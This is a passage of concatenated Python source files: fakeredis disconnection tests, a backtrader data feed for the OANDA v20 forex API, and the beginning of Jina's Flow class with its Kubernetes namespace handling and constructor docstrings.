self.redis.zincrby('name', 1)
def test_zinterstore(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zinterstore('dest', ['a', 'b'])
def test_zrange(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zrange('name', 1, 5)
def test_zrangebyscore(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zrangebyscore('name', 1, 5)
def test_zrangebylex(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zrangebylex('name', 1, 4)
def test_zrem(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zrem('name', [1])
def test_zremrangebyrank(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zremrangebyrank('name', 1, 5)
def test_zremrangebyscore(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zremrangebyscore('name', 1, 5)
def test_zremrangebylex(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zremrangebylex('name', 1, 5)
def test_zlexcount(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zlexcount('name', 1, 5)
def test_zrevrange(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zrevrange('name', 1, 5, 1)
def test_zrevrangebyscore(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zrevrangebyscore('name', 5, 1)
def test_zrevrangebylex(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zrevrangebylex('name', 5, 1)
def test_zrevrank(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zrevrank('name', 2)
def test_zscore(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zscore('name', 2)
def test_zunionstore(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zunionstore('dest', ['1', '2'])
def test_pipeline(self):
with self.assertRaises(redis.ConnectionError):
self.redis.pipeline()
def test_transaction(self):
with self.assertRaises(redis.ConnectionError):
def func(a):
return a * a
self.redis.transaction(func, 3)
def test_lock(self):
with self.assertRaises(redis.ConnectionError):
self.redis.lock('name')
def test_pubsub(self):
with self.assertRaises(redis.ConnectionError):
self.redis.pubsub()
def test_pfadd(self):
with self.assertRaises(redis.ConnectionError):
self.redis.pfadd('name', [1])
def test_pfmerge(self):
with self.assertRaises(redis.ConnectionError):
self.redis.pfmerge('dest', ['a', 'b'])
def test_scan(self):
with self.assertRaises(redis.ConnectionError):
self.redis.scan()
def test_sscan(self):
with self.assertRaises(redis.ConnectionError):
self.redis.sscan('name')
def test_hscan(self):
with self.assertRaises(redis.ConnectionError):
self.redis.hscan('name')
def test_scan_iter(self):
with self.assertRaises(redis.ConnectionError):
self.redis.scan_iter()
def test_sscan_iter(self):
with self.assertRaises(redis.ConnectionError):
self.redis.sscan_iter('name')
def test_hscan_iter(self):
with self.assertRaises(redis.ConnectionError):
self.redis.hscan_iter('name')
class TestPubSubConnected(unittest.TestCase):
def create_redis(self):
return fakeredis.FakePubSub(connected=False)
def setUp(self):
self.pubsub = self.create_redis()
def tearDown(self):
del self.pubsub
def test_basic_subscript(self):
with self.assertRaises(redis.ConnectionError):
self.pubsub.subscribe('logs')
def test_subscript_conn_lost(self):
self.pubsub.connected = True
self.pubsub.subscribe('logs')
self.pubsub.connected = False
with self.assertRaises(redis.ConnectionError):
self.pubsub.get_message()
def test_put_listen(self):
self.pubsub.connected = True
count = self.pubsub.put('logs', 'mymessage', 'subscribe')
self.assertEqual(count, 1, 'Message count should be 1')
self.pubsub.connected = False
with self.assertRaises(redis.ConnectionError):
self.pubsub.get_message()
self.pubsub.connected = True
msg = self.pubsub.get_message()
check = {
'type': 'subscribe',
'pattern': None,
'channel': b'logs',
'data': 'mymessage'
}
self.assertEqual(msg, check, 'Message was not published to channel')
if __name__ == '__main__':
unittest.main()
|
oandav20feed.py
|
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from datetime import datetime, timedelta, timezone
import time as _time
import threading
from backtrader.feed import DataBase
from backtrader import TimeFrame, date2num, num2date
from backtrader.utils.py3 import queue, with_metaclass
from btoandav20.stores import oandav20store
class MetaOandaV20Data(DataBase.__class__):
def __init__(self, name, bases, dct):
'''Class has already been created ... register'''
# Initialize the class
super(MetaOandaV20Data, self).__init__(name, bases, dct)
# Register with the store
oandav20store.OandaV20Store.DataCls = self
class OandaV20Data(with_metaclass(MetaOandaV20Data, DataBase)):
'''Oanda v20 Data Feed.
Params:
- ``qcheck`` (default: ``0.5``)
Time in seconds to wake up if no data is received to give a chance to
resample/replay packets properly and pass notifications up the chain
- ``historical`` (default: ``False``)
If set to ``True`` the data feed will stop after doing the first
download of data.
The standard data feed parameters ``fromdate`` and ``todate`` will be
used as reference.
The data feed will make multiple requests if the requested duration is
larger than the one allowed by Oanda given the timeframe/compression
chosen for the data.
- ``backfill_start`` (default: ``True``)
Perform backfilling at the start. The maximum possible historical data
will be fetched in a single request.
- ``backfill`` (default: ``True``)
Perform backfilling after a disconnection/reconnection cycle. The gap
duration will be used to download the smallest possible amount of data
- ``backfill_from`` (default: ``None``)
An additional data source can be passed to do an initial layer of
backfilling. Once the data source is depleted and if requested,
backfilling from oanda will take place. This is ideally meant to
backfill from already stored sources such as a file on disk, but is not
limited to that.
- ``bidask`` (default: ``True``)
If ``True``, then the historical/backfilling requests will request
bid/ask prices from the server
If ``False``, then *midpoint* will be requested
- ``useask`` (default: ``False``)
If ``True`` the *ask* part of the *bidask* prices will be used instead
of the default use of *bid*
- ``reconnect`` (default: ``True``)
Reconnect when network connection is down
- ``reconnections`` (default: ``-1``)
Number of times to attempt reconnections: ``-1`` means forever
- ``candles`` (default: ``False``)
Return candles instead of streaming for current data, granularity
needs to be higher than Ticks
This data feed supports only this mapping of ``timeframe`` and
``compression``, which complies with the definitions in the OANDA API
Developer's Guide:
(TimeFrame.Seconds, 5): 'S5',
(TimeFrame.Seconds, 10): 'S10',
(TimeFrame.Seconds, 15): 'S15',
(TimeFrame.Seconds, 30): 'S30',
(TimeFrame.Minutes, 1): 'M1',
(TimeFrame.Minutes, 2): 'M2',
(TimeFrame.Minutes, 3): 'M3',
(TimeFrame.Minutes, 4): 'M4',
(TimeFrame.Minutes, 5): 'M5',
(TimeFrame.Minutes, 10): 'M10',
(TimeFrame.Minutes, 15): 'M15',
(TimeFrame.Minutes, 30): 'M30',
(TimeFrame.Minutes, 60): 'H1',
(TimeFrame.Minutes, 120): 'H2',
(TimeFrame.Minutes, 180): 'H3',
(TimeFrame.Minutes, 240): 'H4',
(TimeFrame.Minutes, 360): 'H6',
(TimeFrame.Minutes, 480): 'H8',
(TimeFrame.Days, 1): 'D',
(TimeFrame.Weeks, 1): 'W',
(TimeFrame.Months, 1): 'M',
Any other combination will be rejected
'''
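# A minimal usage sketch (illustrative only, not part of the original module).
# The data class is registered with the store above, so instances are normally
# obtained via ``store.getdata(...)``. The credential keyword names below
# (token, account, practice) are assumptions taken from typical btoandav20
# setups and may differ in your installation:
#
#   import backtrader as bt
#   from btoandav20.stores.oandav20store import OandaV20Store
#
#   store = OandaV20Store(token='...', account='...', practice=True)
#   data = store.getdata(dataname='EUR_USD',
#                        timeframe=bt.TimeFrame.Minutes, compression=5)
#   cerebro = bt.Cerebro()
#   cerebro.adddata(data)
#   cerebro.run()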
params = dict(
qcheck=0.5,
historical=False, # do backfilling at the start
backfill_start=True, # do backfilling at the start
backfill=True, # do backfilling when reconnecting
backfill_from=None, # additional data source to do backfill from
bidask=True,
useask=False,
candles=False,
# TODO readd tmout - set timeout in store
reconnect=True,
reconnections=-1, # forever
)
_store = oandav20store.OandaV20Store
# States for the Finite State Machine in _load
_ST_FROM, _ST_START, _ST_LIVE, _ST_HISTORBACK, _ST_OVER = range(5)
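# State meanings (as used by _st_start/_load below):
#   _ST_FROM       - replay bars from the optional ``backfill_from`` feed
#   _ST_START      - transitional state that kicks off history/live handling
#   _ST_HISTORBACK - consume historical candles from ``self.qhist``
#   _ST_LIVE       - consume live data from ``self.qlive`` (stream or poll)
#   _ST_OVER       - the feed is done (end of data or unrecoverable error)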
def islive(self):
'''Returns ``True`` to notify ``Cerebro`` that preloading and runonce
should be deactivated'''
return True
def __init__(self, **kwargs):
self.o = self._store(**kwargs)
if self.p.bidask:
self._candleFormat = 'A' if self.p.useask else 'B'
else:
self._candleFormat = 'M'
def setenvironment(self, env):
'''Receives an environment (cerebro) and passes it over to the store it
belongs to'''
super(OandaV20Data, self).setenvironment(env)
env.addstore(self.o)
def start(self):
'''Starts the Oanda connection and retrieves the instrument details
(stored in ``contractdetails``) if the instrument exists'''
super(OandaV20Data, self).start()
# Create attributes as soon as possible
self._statelivereconn = False # if reconnecting in live state
self._storedmsg = dict() # keep pending live message (under None)
self.qlive = queue.Queue()
self._state = self._ST_OVER
self._reconns = self.p.reconnections
self.contractdetails = None
# Kickstart store and get queue to wait on
self.o.start(data=self)
# check if the granularity is supported
otf = self.o.get_granularity(self._timeframe, self._compression)
if otf is None:
self.put_notification(self.NOTSUPPORTED_TF)
self._state = self._ST_OVER
return
self.contractdetails = cd = self.o.get_instrument(self.p.dataname)
if cd is None:
self.put_notification(self.NOTSUBSCRIBED)
self._state = self._ST_OVER
return
if self.p.backfill_from is not None:
self._state = self._ST_FROM
self._st_start(True)
self.p.backfill_from.setenvironment(self._env)
self.p.backfill_from._start()
else:
self._start_finish()
self._state = self._ST_START # initial state for _load
self._st_start()
self._reconns = 0
def _st_start(self, instart=True):
if self.p.historical:
self.put_notification(self.DELAYED)
dtend = None
if self.todate < float('inf'):
dtend = num2date(self.todate)
dtbegin = None
if self.fromdate > float('-inf'):
dtbegin = num2date(self.fromdate)
self.qhist = self.o.candles(
self.p.dataname, dtbegin, dtend,
self._timeframe, self._compression,
candleFormat=self._candleFormat,
includeFirst=True)
self._state = self._ST_HISTORBACK
return True
# depending on candles, either stream or use poll
if instart:
self._statelivereconn = self.p.backfill_start
else:
self._statelivereconn = self.p.backfill
if self._statelivereconn:
self.put_notification(self.DELAYED)
if not self.p.candles:
# create a new stream on each call
self.qlive = self.o.streaming_prices(
self.p.dataname)
elif instart:
# poll thread will never die, so no need to recreate it
self.poll_thread()
self._state = self._ST_LIVE
return True # no return before - implicit continue
def poll_thread(self):
t = threading.Thread(target=self._t_poll)
t.daemon = True
t.start()
def _t_poll(self):
dtstart = self._getstarttime(
self._timeframe,
self._compression,
offset=1)
while True:
dtcurr = self._getstarttime(self._timeframe, self._compression)
# request candles in live instead of stream
if dtcurr > dtstart:
if len(self) > 1:
# len == 1 ... forwarded for the 1st time
dtbegin = self.datetime.datetime(-1)
elif self.fromdate > float('-inf'):
dtbegin = num2date(self.fromdate)
else: # 1st bar and no begin set
dtbegin = dtstart
self.qlive = self.o.candles(
self.p.dataname, dtbegin, None,
self._timeframe, self._compression,
candleFormat=self._candleFormat,
onlyComplete=True,
includeFirst=False)
dtstart = dtbegin
# sleep until next call
dtnow = datetime.utcnow()
dtnext = self._getstarttime(
self._timeframe,
self._compression,
dt=dtnow,
offset=-1)
dtdiff = dtnext - dtnow
tmout = (dtdiff.days * 24 * 60 * 60) + dtdiff.seconds + 1
if tmout <= 0:
tmout = 5
_time.sleep(tmout)
def _getstarttime(self, timeframe, compression, dt=None, offset=0):
'''Returns the start of the period based on the current time (or the
provided time), using UTC 22:00 (5:00 pm New York) as the start of
the day.'''
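# Worked examples (illustrative):
#   TimeFrame.Minutes, compression=5, dt=2020-01-02 14:07 UTC -> 2020-01-02 14:05 UTC
#   TimeFrame.Days,    compression=1, dt=2020-01-02 21:30 UTC -> 2020-01-01 22:00 UTC
#   TimeFrame.Days,    compression=1, dt=2020-01-02 23:30 UTC -> 2020-01-02 22:00 UTC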
if dt is None:
dt = datetime.utcnow()
if timeframe == TimeFrame.Seconds:
dt = dt.replace(
second=(dt.second // compression) * compression,
microsecond=0)
if offset:
dt = dt - timedelta(seconds=compression*offset)
elif timeframe == TimeFrame.Minutes:
if compression >= 60:
hours = 0
minutes = 0
# get start of day
dtstart = self._getstarttime(TimeFrame.Days, 1, dt)
# diff start of day with current time to get seconds
# since start of day
dtdiff = dt - dtstart
hours = dtdiff.seconds//((60*60)*(compression//60))
minutes = compression % 60
dt = dtstart + timedelta(hours=hours, minutes=minutes)
else:
dt = dt.replace(
minute=(dt.minute // compression) * compression,
second=0,
microsecond=0)
if offset:
dt = dt - timedelta(minutes=compression*offset)
elif timeframe == TimeFrame.Days:
# TODO use sessionstart if available, else use 0
# start of day is UTC 22 (5pm new york)
if dt.hour < 22:
dt = dt - timedelta(days=1)
if offset:
dt = dt - timedelta(days=offset)
dt = dt.replace(hour=22, minute=0, second=0, microsecond=0)
elif timeframe == TimeFrame.Weeks:
if dt.weekday() != 6:
# sunday is start of week at 5pm new york
dt = dt - timedelta(days=dt.weekday() + 1)
if offset:
dt = dt - timedelta(days=offset * 7)
# TODO use sessionstart if available, else use 0
dt = dt.replace(hour=22, minute=0, second=0, microsecond=0)
elif timeframe == TimeFrame.Months:
if offset:
dt = dt - timedelta(days=(min(28 + dt.day, 31)))
# last day of month
last_day_of_month = dt.replace(day=28) + timedelta(days=4)
last_day_of_month = last_day_of_month - timedelta(
days=last_day_of_month.day)
last_day_of_month = last_day_of_month.day
# start of month (1 at 0, 22 last day of prev month)
if dt.day < last_day_of_month:
dt = dt - timedelta(days=dt.day)
# TODO use sessionstart if available, else use 0
dt = dt.replace(hour=22, minute=0, second=0, microsecond=0)
return dt
def stop(self):
'''Stops and tells the store to stop'''
super(OandaV20Data, self).stop()
self.o.stop()
def replay(self, **kwargs):
# save original timeframe and compression to fetch data
# they will be overridden when calling replay
orig_timeframe = self._timeframe
orig_compression = self._compression
# setting up replay configuration
super(DataBase, self).replay(**kwargs)
# putting back original timeframe and compression to fetch correct data
# the replay configuration will still use the correct timeframe and
# compression for strategy
self._timeframe = orig_timeframe
self._compression = orig_compression
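# A minimal usage sketch for replay (hypothetical setup, assuming a configured
# store `store` and a cerebro instance): the feed keeps fetching at its native
# timeframe/compression, while backtrader replays the data at the coarser
# timeframe passed to replaydata().
#
#   data = store.getdata(dataname='EUR_USD',
#                        timeframe=bt.TimeFrame.Minutes, compression=1)
#   cerebro.replaydata(data,
#                      timeframe=bt.TimeFrame.Minutes, compression=60)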
def haslivedata(self):
return bool(self._storedmsg or self.qlive) # do not return the objs
def _load(self):
if self._state == self._ST_OVER:
return False
while True:
if self._state == self._ST_LIVE:
try:
msg = (self._storedmsg.pop(None, None) or
self.qlive.get(timeout=self._qcheck))
except queue.Empty:
return None
if 'msg' in msg:
self.put_notification(self.CONNBROKEN)
if not self.p.reconnect or self._reconns == 0:
# Can no longer reconnect
self.put_notification(self.DISCONNECTED)
self._state = self._ST_OVER
return False # failed
# sleep only on reconnect
if self._reconns != self.p.reconnections:
_time.sleep(self.o.p.reconntimeout)
# Can reconnect
self._reconns -= 1
self._st_start(instart=False)
continue
self._reconns = self.p.reconnections
# Process the message according to expected return type
if not self._statelivereconn:
if self._laststatus != self.LIVE:
if self.qlive.qsize() <= 1: # very short live queue
self.put_notification(self.LIVE)
if msg:
if self.p.candles:
ret = self._load_candle(msg)
else:
ret = self._load_tick(msg)
if ret:
return True
# could not load bar ... go and get new one
continue
# Fall through to processing reconnect - try to backfill
self._storedmsg[None] = msg # keep the msg
# else do a backfill
if self._laststatus != self.DELAYED:
self.put_notification(self.DELAYED)
dtend = None
if len(self) > 1:
# len == 1 ... forwarded for the 1st time
dtbegin = self.datetime.datetime(-1).astimezone(timezone.utc)
elif self.fromdate > float('-inf'):
dtbegin = num2date(self.fromdate)
else: # 1st bar and no begin set
# passing None to fetch max possible in 1 request
dtbegin = None
if msg:
dtend = datetime.utcfromtimestamp(float(msg['time']))
# TODO not sure if incomplete candles may destruct something
self.qhist = self.o.candles(
self.p.dataname, dtbegin, dtend,
self._timeframe, self._compression,
candleFormat=self._candleFormat,
includeFirst=True, onlyComplete=False)
self._state = self._ST_HISTORBACK
self._statelivereconn = False # no longer in live
continue
elif self._state == self._ST_HISTORBACK:
msg = self.qhist.get()
if msg is None:
continue
elif 'msg' in msg: # Error
if not self.p.reconnect or self._reconns == 0:
# Can no longer reconnect
self.put_notification(self.DISCONNECTED)
self._state = self._ST_OVER
return False # failed
# Can reconnect
self._reconns -= 1
self._st_start(instart=False)
continue
if msg:
if self._load_candle(msg):
return True # loading worked
continue # not loaded ... date may have been seen
else:
# End of histdata
if self.p.historical: # only historical
self.put_notification(self.DISCONNECTED)
self._state = self._ST_OVER
return False # end of historical
# Live is also wished - go for it
self._state = self._ST_LIVE
continue
elif self._state == self._ST_FROM:
if not self.p.backfill_from.next():
# additional data source is consumed
self._state = self._ST_START
continue
# copy lines of the same name
for alias in self.lines.getlinealiases():
lsrc = getattr(self.p.backfill_from.lines, alias)
ldst = getattr(self.lines, alias)
ldst[0] = lsrc[0]
return True
elif self._state == self._ST_START:
if not self._st_start(instart=False):
self._state = self._ST_OVER
return False
def _load_tick(self, msg):
dtobj = datetime.utcfromtimestamp(float(msg['time']))
dt = date2num(dtobj)
if dt <= self.lines.datetime[-1]:
return False # time already seen
# Common fields
self.lines.datetime[0] = dt
self.lines.volume[0] = 0.0
self.lines.openinterest[0] = 0.0
# Put the prices into the bar
if self.p.bidask:
if self.p.useask:
tick = float(msg['asks'][0]['price'])
else:
tick = float(msg['bids'][0]['price'])
else:
# create mid price
tick = (
float(msg['bids'][0]['price'])
+ float(msg['asks'][0]['price'])) / 2
self.lines.open[0] = tick
self.lines.high[0] = tick
self.lines.low[0] = tick
self.lines.close[0] = tick
self.lines.volume[0] = 0.0
self.lines.openinterest[0] = 0.0
return True
def _load_candle(self, msg):
dtobj = datetime.utcfromtimestamp(float(msg['time']))
dt = date2num(dtobj)
if dt <= self.lines.datetime[-1]:
return False # time already seen
# Common fields
self.lines.datetime[0] = dt
self.lines.volume[0] = float(msg['volume'])
self.lines.openinterest[0] = 0.0
# Put the prices into the bar
if self.p.bidask:
if not self.p.useask:
self.lines.open[0] = float(msg['bid']['o'])
self.lines.high[0] = float(msg['bid']['h'])
self.lines.low[0] = float(msg['bid']['l'])
self.lines.close[0] = float(msg['bid']['c'])
else:
self.lines.open[0] = float(msg['ask']['o'])
self.lines.high[0] = float(msg['ask']['h'])
self.lines.low[0] = float(msg['ask']['l'])
self.lines.close[0] = float(msg['ask']['c'])
else:
self.lines.open[0] = float(msg['mid']['o'])
self.lines.high[0] = float(msg['mid']['h'])
self.lines.low[0] = float(msg['mid']['l'])
self.lines.close[0] = float(msg['mid']['c'])
return True
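# A hedged end-to-end sketch of wiring this feed into a backtest (store and
# credentials are placeholders, not taken from this file): cerebro drives
# _load(), which walks the _ST_HISTORBACK -> _ST_LIVE state machine above,
# backfilling candles first and then switching to live ticks or candles.
#
#   import backtrader as bt
#   store = btoandav20.stores.OandaV20Store(token='...', account='...',
#                                           practice=True)
#   data = store.getdata(dataname='EUR_USD',
#                        timeframe=bt.TimeFrame.Minutes, compression=1,
#                        backfill_start=True)
#   cerebro = bt.Cerebro()
#   cerebro.adddata(data)
#   cerebro.run()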
base.py
import argparse
import base64
import copy
import itertools
import json
import multiprocessing
import os
import re
import sys
import threading
import time
import uuid
from collections import OrderedDict
from contextlib import ExitStack
from typing import (
Optional,
Union,
Tuple,
List,
Set,
Dict,
overload,
Type,
TYPE_CHECKING,
)
from .builder import allowed_levels, _hanging_pods
from .. import __default_host__, helper
from ..clients import Client
from ..clients.mixin import AsyncPostMixin, PostMixin
from ..enums import (
FlowBuildLevel,
PodRoleType,
FlowInspectType,
GatewayProtocolType,
InfrastructureType,
PollingType,
)
from ..excepts import (
FlowTopologyError,
FlowMissingPodError,
RuntimeFailToStart,
)
from ..helper import (
colored,
get_public_ip,
get_internal_ip,
typename,
ArgNamespace,
download_mermaid_url,
CatchAllCleanupContextManager,
)
from ..jaml import JAMLCompatible
from ..logging.logger import JinaLogger
from ..parsers import set_gateway_parser, set_pod_parser, set_client_cli_parser
from ..parsers.flow import set_flow_parser
from ..peapods import Pod
from ..peapods.pods.factory import PodFactory
__all__ = ['Flow']
class FlowType(type(ExitStack), type(JAMLCompatible)):
"""Type of Flow, metaclass of :class:`BaseFlow`"""
pass
_regex_port = r'(.*?):([0-9]{1,4}|[1-5][0-9]{4}|6[0-4][0-9]{3}|65[0-4][0-9]{2}|655[0-2][0-9]|6553[0-5])$'
if TYPE_CHECKING:
from ..executors import BaseExecutor
from ..clients.base import BaseClient
from .asyncio import AsyncFlow
GATEWAY_NAME = 'gateway'
FALLBACK_PARSERS = [
set_gateway_parser(),
set_pod_parser(),
set_client_cli_parser(),
set_flow_parser(),
]
class Flow(PostMixin, JAMLCompatible, ExitStack, metaclass=FlowType):
"""Flow is how Jina streamlines and distributes Executors. """
class _FlowK8sInfraResourcesManager:
def __init__(self, k8s_namespace: str, k8s_custom_resource_dir: Optional[str]):
self.k8s_namespace = k8s_namespace
self.k8s_custom_resource_dir = k8s_custom_resource_dir
self.namespace_created = False
def __enter__(self):
from ..peapods.pods.k8slib import kubernetes_tools, kubernetes_client
client = kubernetes_client.K8sClients().core_v1
list_namespaces = [
item.metadata.name for item in client.list_namespace().items
]
if self.k8s_namespace not in list_namespaces:
with JinaLogger(f'create_{self.k8s_namespace}') as logger:
logger.info(f'🏝️\tCreate Namespace "{self.k8s_namespace}"')
kubernetes_tools.create(
'namespace',
{'name': self.k8s_namespace},
logger=logger,
custom_resource_dir=self.k8s_custom_resource_dir,
)
self.namespace_created = True
def __exit__(self, exc_type, exc_val, exc_tb):
from ..peapods.pods.k8slib import kubernetes_client
if self.namespace_created:
client = kubernetes_client.K8sClients().core_v1
client.delete_namespace(name=self.k8s_namespace)
# Wait for namespace being actually deleted
while True:
list_namespaces = [
item.metadata.name for item in client.list_namespace().items
]
if self.k8s_namespace not in list_namespaces:
break
else:
time.sleep(1.0)
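# A minimal sketch of the manager above (kubernetes access is assumed to be
# configured): entering it creates the namespace when missing, and exiting
# deletes the namespace again only if this Flow created it.
#
#   mgr = Flow._FlowK8sInfraResourcesManager(
#       k8s_namespace='my-flow', k8s_custom_resource_dir=None)
#   with mgr:
#       ...   # deploy pods into the namespace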
# overload_inject_start_client_flow
@overload
def __init__(
self,
*,
asyncio: Optional[bool] = False,
host: Optional[str] = '0.0.0.0',
https: Optional[bool] = False,
port: Optional[int] = None,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina client` CLI.
:param asyncio: If set, then the input and output of this Client work in an asynchronous manner.
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param https: If set, connect to gateway using https
:param port: The port of the Gateway, which the client should connect to.
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. otherwise, it will unset these proxy variables before start. gRPC seems to prefer no proxy
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_client_flow
# overload_inject_start_gateway_flow
@overload
def __init__(
self,
*,
compress: Optional[str] = 'NONE',
compress_min_bytes: Optional[int] = 1024,
compress_min_ratio: Optional[float] = 1.1,
connection_list: Optional[str] = None,
cors: Optional[bool] = False,
daemon: Optional[bool] = False,
default_swagger_ui: Optional[bool] = False,
description: Optional[str] = None,
env: Optional[dict] = None,
expose_endpoints: Optional[str] = None,
expose_public: Optional[bool] = False,
graph_description: Optional[str] = '{}',
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
log_config: Optional[str] = None,
name: Optional[str] = 'gateway',
native: Optional[bool] = False,
no_crud_endpoints: Optional[bool] = False,
no_debug_endpoints: Optional[bool] = False,
pods_addresses: Optional[str] = '{}',
polling: Optional[str] = 'ANY',
port_expose: Optional[int] = None,
port_in: Optional[int] = None,
prefetch: Optional[int] = 0,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
replicas: Optional[int] = 1,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'GRPCGatewayRuntime',
shards: Optional[int] = 1,
timeout_ctrl: Optional[int] = 60,
timeout_ready: Optional[int] = 600000,
title: Optional[str] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_after_address: Optional[str] = None,
uses_before_address: Optional[str] = None,
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
uvicorn_kwargs: Optional[dict] = None,
workspace: Optional[str] = None,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina gateway` CLI.
:param compress: The compress algorithm used over the entire Flow.
Note that this is not necessarily effective,
it depends on the settings of `--compress-min-bytes` and `--compress-min-ratio`
:param compress_min_bytes: The original message size must be larger than this number to trigger the compress algorithm, -1 means disable compression.
:param compress_min_ratio: The compression ratio (uncompressed_size/compressed_size) must be higher than this number to trigger the compress algorithm.
:param connection_list: dictionary JSON with a list of connections to configure
:param cors: If set, a CORS middleware is added to FastAPI frontend to allow cross-origin access.
:param daemon: The Pea attempts to terminate all of its Runtime child processes/threads on exiting. Setting it to true basically tells the Pea not to wait on the Runtime when closing
:param default_swagger_ui: If set, the default swagger ui is used for `/docs` endpoint.
:param description: The description of this HTTP server. It will be used in automatics docs such as Swagger UI.
:param env: The map of environment variables that are available inside runtime
:param expose_endpoints: A JSON string that represents a map from executor endpoints (`@requests(on=...)`) to HTTP endpoints.
:param expose_public: If set, expose the public IP address to remote when necessary, by default it exposes the private IP address, which only allows accessing under the same network/subnet. Important to set this to true when the Pea will receive input connections from remote Peas
:param graph_description: Routing graph for the gateway
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for binding to, by default it is 0.0.0.0
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param native: If set, only native Executors are allowed, and the Executor is always run inside WorkerRuntime.
:param no_crud_endpoints: If set, /index, /search, /update, /delete endpoints are removed from HTTP interface.
Any executor that has `@requests(on=...)` bound with those values will receive data requests.
:param no_debug_endpoints: If set, /status /post endpoints are removed from HTTP interface.
:param pods_addresses: dictionary JSON with the input addresses of each Pod
:param polling: The polling strategy of the Pod and its endpoints (when `shards>1`).
Can be defined for all endpoints of a Pod or by endpoint.
Define per Pod:
- ANY: only one (whoever is idle) Pea polls the message
- ALL: all Peas poll the message (like a broadcast)
Define per Endpoint:
JSON dict, {endpoint: PollingType}
{'/custom': 'ALL', '/search': 'ANY', '*': 'ANY'}
:param port_expose: The port that the gateway exposes for clients for GRPC connections.
:param port_in: The port for input data to bind to, default a random port between [49152, 65535]
:param prefetch: Number of requests fetched from the client before feeding into the first Executor.
Used to control the speed of data input into a Flow. 0 disables prefetch (disabled by default)
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. otherwise, it will unset these proxy variables before start. gRPC seems to prefer no proxy
:param py_modules: The customized python modules need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param replicas: The number of replicas in the pod, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary
:param runtime_backend: The parallel backend of the runtime inside the Pea
:param runtime_cls: The runtime class to run inside the Pea
:param shards: The number of shards in the pod running at the same time, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary. For more details check https://docs.jina.ai/fundamentals/flow/topology/
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pea waits for the runtime to be ready, -1 for waiting forever
:param title: The title of this HTTP server. It will be used in automatics docs such as Swagger UI.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When used under Python, the following values are additionally supported:
- a Python dict that represents the config
- a text file stream that has a `.read()` interface
:param uses_after_address: The address of the uses-after runtime
:param uses_before_address: The address of the uses-before runtime
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param uvicorn_kwargs: Dictionary of kwargs arguments that will be passed to Uvicorn server when starting the server
More details can be found in Uvicorn docs: https://www.uvicorn.org/settings/
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_gateway_flow
# overload_inject_start_flow
@overload
def __init__(
self,
*,
env: Optional[dict] = None,
inspect: Optional[str] = 'COLLECT',
log_config: Optional[str] = None,
name: Optional[str] = None,
polling: Optional[str] = 'ANY',
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
timeout_ctrl: Optional[int] = 60,
uses: Optional[str] = None,
workspace: Optional[str] = './',
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina flow` CLI.
:param env: The map of environment variables that are available inside runtime
:param inspect: The strategy on those inspect pods in the flow.
If `REMOVE` is given then all inspect pods are removed when building the flow.
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param polling: The polling strategy of the Pod and its endpoints (when `shards>1`).
Can be defined for all endpoints of a Pod or by endpoint.
